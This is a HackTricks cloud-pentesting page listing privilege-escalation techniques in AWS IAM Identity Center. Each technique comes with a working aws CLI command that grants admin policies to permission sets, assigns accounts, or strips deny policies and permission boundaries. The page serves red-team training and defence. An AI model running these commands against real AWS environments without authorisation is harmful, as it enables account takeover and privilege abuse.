{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.
For more information about AWS Identity Center / AWS SSO check:
{% content-ref url="../aws-services/aws-iam-enum.md" %} aws-iam-enum.md {% endcontent-ref %}
{% hint style="warning" %}
Note that by default, only users with permissions form the Management Account are going to be able to access and control the IAM Identity Center.
Users from other accounts can only allow it if the account is a Delegated Adminstrator.
Check the docs for more info.
{% endhint %}
An easy way to escalate privileges in cases like this one would be to have a permission that allows to reset users passwords. Unfortunately it's only possible to send an email to the user to reset his password, so you would need access to the users email.
With this permission it's possible to set a user inside a group so he will inherit all the permissions the group has.
{% code overflow="wrap" %}
aws identitystore create-group-membership --identity-store-id <tore-id> --group-id <group-id> --member-id UserId=<user-id>
{% endcode %}
An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
{% code overflow="wrap" %}
# Set an inline policy with admin privileges
aws sso-admin put-inline-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --inline-policy file:///tmp/policy.yaml
# Content of /tmp/policy.yaml
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "Statement1",
"Effect": "Allow",
"Action": ["*"],
"Resource": ["*"]
}
]
}
# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
{% endcode %}
An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control
{% code overflow="wrap" %}
# Set AdministratorAccess policy to the permission set
aws sso-admin attach-managed-policy-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --managed-policy-arn "arn:aws:iam::aws:policy/AdministratorAccess"
# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
{% endcode %}
An attacker with this permission could grant extra permissions to a Permission Set that is granted to a user under his control.
{% hint style="warning" %} To abuse these permissions in this case you need to know the name of a customer managed policy that is inside ALL the accounts that are going to be affected. {% endhint %}
{% code overflow="wrap" %}
# Set AdministratorAccess policy to the permission set
aws sso-admin attach-customer-managed-policy-reference-to-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --customer-managed-policy-reference <customer-managed-policy-name>
# Update the provisioning so the new policy is created in the account
aws sso-admin provision-permission-set --instance-arn <instance-arn> --permission-set-arn <perm-set-arn> --target-type ALL_PROVISIONED_ACCOUNTS
{% endcode %}
An attacker with this permission could give a Permission Set to a user under his control to an account.
{% code overflow="wrap" %}
aws sso-admin create-account-assignment --instance-arn <instance-arn> --target-id <account_num> --target-type AWS_ACCOUNT --permission-set-arn <permission_set_arn> --principal-type USER --principal-id <principal_id>
{% endcode %}
Returns the STS short-term credentials for a given role name that is assigned to the user.
{% code overflow="wrap" %}
aws sso get-role-credentials --role-name <value> --account-id <value> --access-token <value>
{% endcode %}
However, you need an access token that I'm not sure how to get (TODO).
An attacker with this permission can remove the association between an AWS managed policy from the specified permission set. It is possible to grant more privileges via detaching a managed policy (deny policy).
{% code overflow="wrap" %}
aws sso-admin detach-managed-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN> --managed-policy-arn <ManagedPolicyARN>
{% endcode %}
An attacker with this permission can remove the association between a Customer managed policy from the specified permission set. It is possible to grant more privileges via detaching a managed policy (deny policy).
{% code overflow="wrap" %}
aws sso-admin detach-customer-managed-policy-reference-from-permission-set --instance-arn <value> --permission-set-arn <value> --customer-managed-policy-reference <value>
{% endcode %}
An attacker with this permission can action remove the permissions from an inline policy from the permission set. It is possible to grant more privileges via detaching an inline policy (deny policy).
{% code overflow="wrap" %}
aws sso-admin delete-inline-policy-from-permission-set --instance-arn <SSOInstanceARN> --permission-set-arn <PermissionSetARN>
{% endcode %}
An attacker with this permission can remove the Permission Boundary from the permission set. It is possible to grant more privileges by removing the restrictions on the Permission Set given from the Permission Boundary.
{% code overflow="wrap" %}
aws sso-admin delete-permissions-boundary-from-permission-set --instance-arn <value> --permission-set-arn <value>
{% endcode %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.